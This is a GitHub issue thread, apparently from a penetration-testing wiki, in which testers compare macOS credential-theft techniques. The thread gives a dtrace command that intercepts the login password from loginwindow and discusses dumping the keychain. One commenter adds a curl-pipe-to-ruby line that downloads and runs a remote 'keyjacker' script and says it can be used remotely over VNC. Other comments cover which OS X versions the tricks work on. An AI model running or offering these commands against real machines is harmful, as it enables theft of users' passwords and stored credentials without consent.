Comments (5)

OJ commented on August 19, 2024

This is what I get:

dtrace: invalid probe specifier pid$target::SecKeychainLogin:entry{trace(copyinstr(uregs[R_ECX]));}: pid provider is not installed on this system

😢
System info:

$ uname -a                                                                                                     ⏎
Darwin cdecl.local 13.4.0 Darwin Kernel Version 13.4.0: Wed Mar 18 16:20:14 PDT 2015; root:xnu-2422.115.14~1/RELEASE_X86_64 x86_64

from pwnwiki.github.io.

WebBreacher commented on August 19, 2024

@OJ - It was on Twitter so it has to be true!

Seriously though, the first command appears to work on my MBP:

└──> $ sudo dtrace -n 'pid$target::SecKeychainLogin:entry{trace(copyinstr(uregs[R_ECX]));}' -p $(ps -A | grep -m1 loginwindow | awk '{print $1}')
dtrace: description 'pid$target::SecKeychainLogin:entry' matched 1 probe

And the second (dump the keychain) works too but pops up a "do you want this app to access your keychain" prompt for each cred that is being dumped. I'm VERY sure that users/victims will notice this.

└──> $ uname -a
Darwin c02kj19lfft4.home 13.4.0 Darwin Kernel Version 13.4.0: Wed Mar 18 16:20:14 PDT 2015; root:xnu-2422.115.14~1/RELEASE_X86_64 x86_64

OJ commented on August 19, 2024

hehe yeah sorry mate. I wasn't implying that it was you. I think it might rely on Yosemite (I'm still on Mavericks).

Fun stuff though!

WebBreacher commented on August 19, 2024

No worries... good to know where it does/does not work too. I'm on 10.9.5 OS X.

sho-luv commented on August 19, 2024

curl https://raw.githubusercontent.com/erran/keyjacker/master/keyjacker.rb | ruby

Coworker Erran wrote this when he was like 16 or so. Still works pretty well on assessments. Again, you need to click allow, which means you need GUI access, but I have pulled that off remotely with VNC. Not super stealthy but gets the job done.

Leon Johnson

On Jun 25, 2015, at 6:48 AM, OJ Reeves [email protected] wrote:

This is what I get:

dtrace: invalid probe specifier pid$target::SecKeychainLogin:entry{trace(copyinstr(uregs[R_ECX]));}: pid provider is not installed on this system

System info:

$ uname -a ⏎
Darwin cdecl.local 13.4.0 Darwin Kernel Version 13.4.0: Wed Mar 18 16:20:14 PDT 2015; root:xnu-2422.115.14~1/RELEASE_X86_64 x86_64
